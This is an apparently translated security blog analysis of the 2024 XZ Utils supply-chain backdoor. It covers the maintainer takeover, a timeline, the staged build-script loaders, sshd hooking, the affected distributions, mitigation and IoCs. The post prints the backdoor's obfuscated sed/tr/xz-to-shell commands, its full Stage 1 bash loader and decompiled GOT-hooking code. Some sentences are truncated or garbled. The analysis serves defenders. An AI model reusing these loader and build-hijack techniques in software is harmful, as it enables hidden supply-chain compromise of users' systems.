The XZ Backdoor issue triggered by one untrusted maintainer

Executive Summary

  • On March 29, 2024, a supply chain attack occurred targeting XZ Utils, an open source compression utility used in Unix-like and Windows operating systems . It was confirmed that version .1 contained a backdoor and was distributed.
    — XZ Utils repository: https[:]//github[.]com/tukaani-project/xz
    — Mirrored developer website: https[:]//git.tukaani[.]org/?p=xz.git
    — Upstream of open source: source repositories and projects where contributions are made and releases are made.
  • User JiaT75, who released a version containing malicious code, has obtained maintenance rights based on the trust gained by contributing to the
  • Afterwards, user JiaT75 released a tarball containing a backdoor in the
    , In general, most Linux distributions are distributed by adding libsystemd dependency to downstream sshd due to the systemd-notify function of the daemon service.
  • The malicious code hooks the GOT of RSA_public_decrypt and performs malicious actions by verifying the signature received through sshd and then executing arbitrary commands.
  • It is conceivable that the JiaT75 user’s account was hijacked and exploited for the attack, but it is highly likely that a long effort was made to insert a backdoor like this
    — in particular, a sophisticated and obfuscated device was used to insert the backdoor by cleverly interfering with the build process. Since inserting a backdoor is a task that cannot be accomplished in a short period of time, many analysts estimate that this attack was likely carried out by a threat group supported by the state.
  • This attack occurred because important large-scale infrastructure projects depended on open source projects maintained by a small number of contributors. It is being discussed as a problem in the current open source ecosystem, and there are discussions on establishing countermeasures such as compensation for these contributors and securing reviewers. triggering.
    — In the future, special attention will be required against such supply chain attacks on open source, and it is believed that active discussions will be needed on security inspection measures for open source projects.

Introduction

On March 29, 2024 (early morning on Saturday the 30th, Korean time), Microsoft engineer Andres Freund shared with oss-security, an open source security community, that a backdoor had been inserted into the XZ repository for malicious purposes.

Afterwards, additional information analyzed by many analysts was revealed, and it was confirmed that a user named JiaT75 released a tarball containing backdoor code in the XZ repository on February 24, 2024 (version 5.6.0) .

  • Tarball : A file created using the tar command, meaning a file that combines files and directories into one.
  • XZ : One of the programs for file compression, supports files using the LZMA algorithm (tar.xz, etc.)

The content spread quickly, and CISA immediately posted an ALERT post, and it was assigned as CVE-2024–3094 . Because this vulnerability is scored as CVSS3:10.0 and no patch has been released, we strongly recommend that you check and respond to individual action plans according to your operating environment.

XZ Utils is an open source compression utility used in Unix and Windows operating systems, and is used on many servers and PCs around the world. XZ Utils also includes liblzma, which handles the LZMA algorithm used in the Linux kernel. However, due to the fact that the attack was detected relatively quickly compared to its impact and that it was not reflected in the official stable version of Linux distribution, no malicious actions related to the XZ backdoor malware have been disclosed to date . Since the attacker prepared the attack for at least two years, it is highly likely that he did not deploy backdoors and take hasty actions based on the attack scenario to hide his work.

To insert this backdoor, the attacker served as a trusted Maintainer of XZ Utils for at least two years. It is conceivable that the JiaT75 user’s account was hijacked and abused for an attack, but it is highly likely that a long period of effort was put into inserting such a backdoor. In particular, cleverly interfering with the build process to insert a backdoor and inserting a sophisticated and obfuscated backdoor is a task that cannot be accomplished in a short period of time . In this regard, it is assessed that this attack was likely carried out by a threat group supported by the state.

Andres Freund , a Microsoft engineer who first discovered the It was revealed that a backdoor was discovered in the process of identifying the cause after realizing that it had been done .

Timeline

  • 2021–01–26 : Account creation for user Jia Tan (JiaT75), who submitted the commit containing the final malware.
  • 2022–02–06 : Date when user JiaT75 submitted the first commit
    to the XZ repository — added parameter validation logic
  • 2022–11–30 : Changed bug report email address from his own account to XZ official account (xz@tukaani.org)
    — The above email address redirects emails to himself and Jia Tan
  • 2023–01–07 : User JiaT75 merged the first commit
  • 2023–01–11 : Publication date of final version distributed directly by Lasse Collins (5.4.1)
  • 2023–03–18 : Jia Tan builds and publishes 5.4.2
  • 2023–06–27 : Start date of submission of suspicious activity by Jia Tan
  • 2023–07–08 : Pull request to OSS-Fuzz, which performs fuzz testing on open source
    — the request does not contain malware and disables ifunc
  • 2024–02–15 : Add build-to-host.mp4 file name to .gitignore
  • 2024–02–23 : Created a file with obfuscated code added to the test path
    — test/file/bad-3-corrupt_lzma2.xz
    — test/file/good-large_compressed.lzma
  • 2024–02–24 : Version 5.6.0 published with malicious build-to-host.m4
  • 2024–03–09 : Version 5.6.1 published after changing backdoor code
  • 2024–03–29 : Analysis published by Microsoft senior developer Andres Freund
  • 2024–03–30 : Official statement posted by Lasse Collines, original administrator of XZ Utils
    — Excluding Jian Tan from xz@tukaani.org mailing list
    — Removing xz.tukaani.org domain from CNAME
    — Restored 0 Update notice
  • 2024–04–10 : XZ Utils Github repository recovery

Detailed Analysis

A version with malicious code was distributed through the account (JiaT75) of XZ Utils maintainer Jia Tan. Originally, XZ Utils was a project managed solely by one user named Lasse Collin. As a result, Lasse Collin said that a lot of time and resources were invested in managing the project alone, and in this process, he appears to have given authority to Jia Tan to manage the project together.

1. (Possible) Compromise

The connection with user Jia Tan was not specifically identified, but in mid-April 2022, a person named Jigar Kumar left a comment and requested a merge for the patch submitted by Jia Tan through the mailing list. (Reference: Related email )

Figure 1. Text of Jia Tan’s first patch proposal email (left) / Figures 2, 3. Text of Jigar Kumar’s urging email (center, right)

In May 2022, an email sent to Lasse Collin was identified criticizing him for poor project management. In the email at the time, a person named Dennis Ens said he had not yet received an answer to his question and asked if there were any plans for a feature update .

In addition, it was confirmed that Jigar Kumar, who previously insisted on merging user Jia Tan’s commit, once again aggressively criticized Lasse Collin. He criticized the repository, saying it would not improve until a new maintainer was created and that the maintainer was no longer interested in the repository.

Figure 4. Text of Dennis Ens’ email requesting xz’s JAVA support inquiry (left) / Figure 5. Body of Jigar Kumar’s email requesting a new maintainer (right)

In response to this, Lasse Collin said that he was no longer interested in the project and that the project was an unpaid hobby project. Coupled with the fact that he has a lot of inquiry emails delivered to his email address, a user named Jia Tan will have a big role to play for XZ Utils in the future. He also mentioned working with Jian Tan, saying he is currently struggling to manage long-term mental health issues. There appears to be a bit of a date for June 2022, as he mentioned that Jian Tan will have a major role in the project in the future.

Figure 6. Lasse Collin’s explanation of Jigar Kumar’s criticism email (left) / Figure 7. Comment that Jia Tan will soon take on a big role (right)

As such, it is highly likely that this attack was conducted through social engineering, using other accounts to strengthen Jia Tan’s trust two years ago, putting pressure on the original developer and encouraging him to actively introduce a new maintainer . It is expected that the attacker intentionally targeted a project maintained by one person, saying he would provide assistance in selecting an attack target.

2. Exploit the build process

build-to-host.m4 is a normal file that checks compatibility between original systems, and m4 script* is a macro processing scripting language for processing and generating text.
– *m4 script: Processed by aclocal.m4 in the autoconf stage and used when creating the configure file.
The attacker changed part of the build-to-host.m4 script and used it as the first stage to load malware.

XZ Utils provides two build methods, CMake and Automake, and the fact that the m4 script has been changed means that it intervenes in the middle of the Automake build process . The modified m4 script is built and distributed through the process shown below.

In the case of the build-to-host.m4 script, the attacker (JiaT75) added it to the .gitignore file, so the file is not verified in the official repository. However, a built tarball containing a modified build-to-host.m4 file was released, causing projects upstream of XZ Utils to be affected by the malicious version.

Figure 8. Build process

2.1 Initial Stage

The malicious activity begins with the m4/build-to-host.m4 script executed from ./configure. This file is used to match the syntax of the host device to the name of the file to be compiled. The actual malicious code is executed when building files within the tests directory among the scripts, and at this time, $srcdir, which will be described later, points to tests/. The $gl_am_configmake variable in the gl_BUILD_TO_HOST_INIT function within the file contains the path to tests/files/bad-3-corrupt_lzma2.xz, a malicious file disguised as a test file by the following command.

Figure 9. Setting variables within gl_BUILD_TO_HOST_INIT

Afterwards, when the gl_BUILD_TO_HOST function is called, the following command is executed, referring to $gl_am_configmake initialized in the INIT function above. $gl_path_map includes the tr command initialized in the INIT function, and is ultimately executed by combining the sed and tr commands.

  • Intermediate execution command: sed “r\n” tests/files/bad-3-corrupt_lzma2.xz | tr “\t \-_” “ \t_\-” | echo tests/files/bad-3-corrupt_lzma2.xz | sed “s/.*\.//g” -d 2>/dev/null
Figure 10. bad-3-corrupt_lzma2.xz decompression and data conversion

Among the execution commands, the tr command is interpreted as replacing one character with another character through the specified rules for the input data as shown below.

  • Replace 0x09(‘\t’) with 0x20(‘ ‘)
  • Replace 0x20(‘ ‘) with 0x09(‘\t’)
  • Replace 0x2d(‘-‘) with 0x5f(‘_’)
  • Replace 0x5f(‘_’) with 0x2d(‘-‘)

Afterwards, the gl_BUILD_TO_HOST function is executed in $gl_[$1]_prefix and the extension (xz) is extracted and stored, and the replaced data is decompressed to xz. Finally, the bash script is extracted and executed with the following command.

  • Final execution command: sed “r\n” tests/files/bad-3-corrupt_lzma2.xz | tr “\t \-_” “ \t_\-” | xz -d 2>/dev/null
Figure 11. Command execution macro

2.2 Stage 1

The bash script extracted from 2.1 Initial Stage is as follows. (Analysis content was written based on the 5.6.1 version script)

####Hello#### 
# <Random 7-8 bytes of data>
[ ! $( uname ) = "Linux" ] && exit 0
[ ! $( uname ) = "Linux" ] && exit 0
[ ! $( uname ) = "Linux" ] && exit 0
[ ! $( uname ) = "Linux" ] && exit 0
[ ! $( uname ) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status` // find the path of the xz
if test -f ../../config.status; then
eval `grep ^srcdir= ../../config.status`
srcdir= "../../ $srcdir "
fi
export i= "((head -c +1024 >/dev/null) && head - c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/ dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && ( head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null ) && head -c +939)" ;
(xz -dc $srcdir /tests/files/good-large_compressed.lzma
| eval $i
| tail -c +31233
| tr "\114-\321\322-\377\35-\47\14-\34\ 0-\13\50-\113" "\0-\377" )
|xz -F raw --lzma1 -dc
|/bin/sh
####World####

[Execution order]
1) Decompress the tests/files/good-large_compressed.lzma file to xz
2) The data of the uncompressed file is passed to the $i function where the command chain is defined
3) $i has a size of 1,024 bytes. Repeat reading a value of 2,048 bytes at intervals
— repeat until the last remaining data is less than 2,048 bytes
4) In version 5.6.0 , 724 bytes remain, and in version 5.6.1, 939 bytes remain.
5) Merge Remove the data to be used in stage 2 from the existing data to a certain size
— 31,264 bytes in 5.6.0 and 31,233 bytes in 5.6.1
6) Replace existing data with other data through the tr command also used in the initial stage
— 5.6. The substitution values ​​for versions 0 and 5.6.1 are configured differently as follows.

  • 5.6.0 : tr “\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131” “\0-\377”
  • 5.6.1 : tr “\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113” “\0-\377”

7) Decompress the replaced data into lzma through xz and obtain and run the bash script corresponding to Stage 2.

2.3 Stage 2

Stage 2’s script inspects the build environment and decrypts any removed data that was not used in Stage 1.

[Execution order]
1) Check the execution environment of the Stage2 script
— Check whether the user is arbitrarily going through unusual steps such as executing the intermediate stage configure
— Check whether it is a Debian or RPM build of x86_64 architecture
2) Check the above If it passes, merge the data using function $i as in Stage 1.
3) Use the AWK command to decrypt using the numbers obtained using the PRNG algorithm of RC4*.
*However, the algorithm used at this time is different from the general RC4 encryption algorithm. .

  1. Create array S without using an encryption key as follows.
For i in 0..255 
S[i] = ((7 * i) + 5) % 256

2. Pass the first result of the RC4 PRNG for 4,096 bytes in 5.6.0 and 8,196 bytes in 5.6.1.

3. Decrypt the RC4 result and the encrypted data by addition, not by XOR.

4 ) The decrypted data
is then decompressed through
is inserted

2.4 IFUNC Enable

In general, the process of resolving the library address in the Global Offset Table (GOT) can occur anywhere during the execution of a program. However, for security reasons, the above process currently occurs during dynamic linking, and modifications cannot be made while the program is running. Additionally, it is preferred to make resolved addresses immutable. For this reason, the attacker exploited the fact that the GOT could be modified before changing to read-only by introducing the GNU indirect function (ifunc) resolver to eliminate indirect calls using function pointers.

The attacker inserted code that modifies the GOT of the RSA_public_decrypt function into __get_cpuid, which is called from the ifunc resolver in the object file , and changed the function to the address of the malicious code during the execution stage of the ifunc resolver.
As a result, when sshd is actually running, it is configured to execute malicious code specified by the attacker, rather than the normal RSA_public_decrypt function.

if ( symbol_to_resolve_id == RSA_public_decrypt && v11 ) // RSA_public_decrypt function that is the initial hooking target
{
if ...
goto LABEL_27;
}
v13 = v7[ 4 ];
if ( v13 && symbol_to_resolve_id == EVP_PKEY_set1_RSA ) // If RSA_public_decrypt symbol does not exist
{ // Attempt to hook EVP_PKEY_set1_RSA
if ...
v7[ 1 ] = *v13;
v14 = *(filter_options + 0x118 );
*v13 = v14;
if ...
v15 = v7[ 5 ];
if ...
v16 = *v15 <= 0xFFFFFF uLL;
}
else // If both function symbols above do not exist
{
v17 = v7[ 5 ];
if ( symbol_to_resolve_id != RSA_get0_key || !v17 ) // Finally, try hooking RSA_get0_key
return *(a1 + 8 );
if ...
v7[ 2 ] = *v17;
v18 = *(filter_options + 0x120 );
*v17 = v18;
if ...
if ...
v16 = *v13 <= 0xFFFFFF uLL;
}

In this process, it was confirmed that the attacker, considering the possibility that the hooking target, the RSA_public_decrypt function, would be removed with a future OpenSSH update , added logic to sequentially attempt to modify the GOT of other functions, EVP_PKEY_set1_RSA and RSA_get0_key functions, if the symbol of the function was not identified. did.

2.5 Landlock Disable

The attacker modified the CMakeLists.txt file so that it would not compile by intentionally inserting a dot (.) into the test code that checks for the presence of landlock, a sandbox feature supported in Linux . Because of this, landlock is not always activated, but since this is not a necessary process to backdoor SSH, no attacks that can be carried out by disabling landlock have yet been revealed.

Figure 12. CMakeLists.txt modified to disable Landlock.

3. Malicious behavior

Since the malware is distributed in the form of a library, the malware is loaded into the process in an executable file that requires liblzma.

In the case of sshd targeted by malware, the upstream sshd does not have a liblzma dependency, but most Linux distributions generally add a libsystemd dependency to the downstream sshd due to the systemd-notify function of the daemon service .

libsystemd requires liblzma, and as a result, malicious liblzma is installed in the sshd process. Additionally, malware was observed to be activated when the process name was /usr/sbin/sshd.

Figure 13. Command delivery process from attacker

As explained in 2.4 IFUNC Enable , the malware hooks the GOT of RSA_public_decrypt and verifies the signature received through sshd . If the signature is sent by an attacker, it performs malicious actions by executing arbitrary commands.

The ED448 public key is hard-coded into the malware , and it attempts to decrypt data by using the first 32 bytes of the public key as the decryption key for the Chacha20 algorithm.
If decryption proceeds normally, there is a command to be executed on the data and a signature created with it. If the transmitted signature succeeds in verifying the signature with the private key corresponding to the hard-coded ED448 public key, the command contained in the hard-coded message is sent to the system. Execute through a function.

For reference, during the above process, no other information or logs are left that can identify this process, and if the payload and signature are not what the attacker intended, the RSA_public_decrypt function is called as a normal process, making network-level attack detection impossible. .

More details

1.First detection

Microsoft’s Andres Freund, who first discovered the backdoor and disclosed it to the community, began analyzing it after suspecting that there was a lot of CPU load related to liblzma and a valgrind error occurring during sshd login at the time of discovery. He notes that the backdoor caused valgrind errors and crashes in some configurations because the stack layout was different than expected, which he says is fixed
in 5.6.1. He later discovered a backdoor during debugging and reported it to the Openwall Project’s oss-security mailing list. He added that if a backdoor is inserted, login speeds via ssh (about 500ms) will be much slower.

  • Valgrind: A programming tool used to inspect and debug memory management issues.
Figure 14. SSH login processing speed before and after installing XZ Backdoor

2. Initial detection

It was also confirmed that user JiaT75 submitted code in a version without malicious code to the oss-fuzz project, which aims to automatically discover and report vulnerabilities in open source software, around July 2023 . At the time, it was also suggested that the IFUNC fuzzing function, which would be exploited later, had been disabled in advance.

Figure 15. Addition of ifunc function in JiaT75 (left) / Figure 16. Addition of ifunc disable option (right)

3. Other repository affected by the actor

Since user JiaT75 has been active since at least 2021, there is a possibility that he may have been involved in other projects besides XZ. In fact, he has a history of submitting code to patch with the unsafe fprintf function in the libarchive repository in November 2021. One researcher wrote and disclosed a PoC code that triggers the vulnerability . The changes were merged into the main branch .

Impact

XZ Utils is a library widely used in many Linux distributions. Conditions affected by this include distributions that package an upstream tarball built with a malicious build-to-host.m4 macro file, and that add a libsystemd dependency that causes liblzma to be loaded into sshd.

  • Fedora 40 beta, 41, Rawhide : 5.6.0 (2024–02–27), 5.6.1 (2024–03–09)
  • openSUSE Tumbleweed : 5.6.0 (2024–03–05), 5.6.1 (2024–03–17)
  • Alpine Edge : 5.6.1 (2024–03–11)
  • Arch Linux : 5.6.0 (2024–02–24), 5.6.1 (2024–03–10)
  • Debian Unstable : 5.6.0 (2024–02–25), 5.6.1 (2024–03–27)
  • Kali : 5.6.0 (2024–03–26)

In the case of tarball dependencies of non-upstream Github repository versions, such as the OpenWrt distribution, there is no build-to-host.m4 that has been modified due to the .gitignore file. Therefore, even if version 5.6.0/5.6.1 is used, it is not affected by the backdoor, but dormant malware remains in the local storage during the build process, so response such as deleting the storage is necessary.

This backdoor uses the ability to execute arbitrary code in the sshd context, allowing an attacker’s specific signature and establishing an ssh shell connection with root privileges without conditions. This means that an attacker can bypass ssh authentication and execute remote code with root privileges on all systems with vulnerable XZ Utils installed, so the mitigation methods described below must be applied.

Mitigation

If you are using XZ Utils versions 5.6.0 and 5.6.1, we strongly recommend downgrading to version 5.4.x or lower. If the system is using the sshd service, restart the sshd service after downgrading, and monitor suspicious ssh access logs and unauthorized account creation. The attacker used tricks such as flags to disable verbose logging or replacement with normal logs to make it impossible to distinguish abnormal logs, but since the logs accessed through sshd remain normal, they can be monitored based on the user’s access pattern or time of connection. There is a possibility that an attacker’s connection can be detected.

In addition, Lasse Collin, maintainer of

Figure 17. Analysis of Kill Switch ( Link )

If downgrading or later updating to version 5.8.0 is not possible, you can disable the backdoor by activating the Kill Switch by adding the string below to the /etc/environment file and restarting the sshd service as a temporary measure.

  • yolAbejyiejuvnup=Evjtgvsh5okmkAvj

Temporary measures can be taken by stopping the sshd service, but in this case, the impact on the system must also be reviewed.

Detection

The following are publicly available tools and detection methods for detecting CVE-2024–3094.

Conclusion

  • Given that the preparation period for the attack is very long and meticulous, it is unlikely to be an attack committed by a typical cybercriminal or impulsively.
  • In addition, considering that the attack payload delivery process is very complex and the impact of the attack is global, it is suspected that a state-backed attack group is behind it
    — it has a history of carrying out supply chain attacks, etc., and targets the world. China, Russia, and North Korea are all mentioned as carrying out the attack, but no clear evidence has been found yet.
  • This is an incident that occurred because important large-scale infrastructure projects depended on the projects of a small number of open source contributors, and is being discussed as a problem in the current open source ecosystem, sparking discussions on establishing measures such as compensating these contributors and securing reviewers.
  • According to the Boehs blog author, after checking Jia Tan’s access information on the tukaani IRC channel, it was said that the connection was made using an IP suspected to be a VPN located in Vietnam.
  • In the future, special attention will be required against such supply chain attacks on open source, and it is expected that active discussions will be needed on security inspection measures for open source projects.

Reference

Appendix

Appendix A. IoCs

Email

  • jiat0218[@]gmail.com

File hash

  • 81e0fd62752bdab11fa992af9d9545af
  • 307958b78b392e58a2c88e620a121708
  • 213fb2a8131bc108d636f1b03109c37e
  • ac3b4d9f163c90143f938627473a804a
  • 41c96174e4ef3870eb7ec9d5f875a6dc
  • 9ba1a547a18a310fac9c8a419b5794fc
  • 3a4e77b515b4a712a26ebf7274de61fe
  • c04b42084816862fc1d9e4f024a28a39
  • 4f0cf1d2a2d44b75079b3ea5ed28fe54
  • 53d82bb511b71a5d4794cf2d8a2072c1
  • d302c6cb2fa1c03c710fa5285651530f
  • 212ffa0b24bb7d749532425a46764433
  • d26cefd934b33b174a795760fc79e6b5
  • 4ec47410372386d02c432ba10e5d7fda

Network

  • There is no Network IoC discovered to date.

Appendix B. Infographic (Authored by Thomas Roccia )

Appendix C. ATT&CK MATRIX

Reconnaissance

  • (T1593.003) Code Repositories

Resource Development

  • (T1585.002) Email Accounts
  • (T1650) Acquire Access

Initial Access

  • (T1195.001) Compromise Software Dependencies and Development Tools

Execution

  • (T1059.004) Unix Shell

Defense Evasion

  • (T1140) Deobfuscate/Decode Files or Information

Command and Control

  • (T1573.001) Symmetric Cryptography

https://medium.com/s2wblog/the-xz-backdoor-issue-triggered-by-one-untrusted-maintainer-2d5e5c1273d0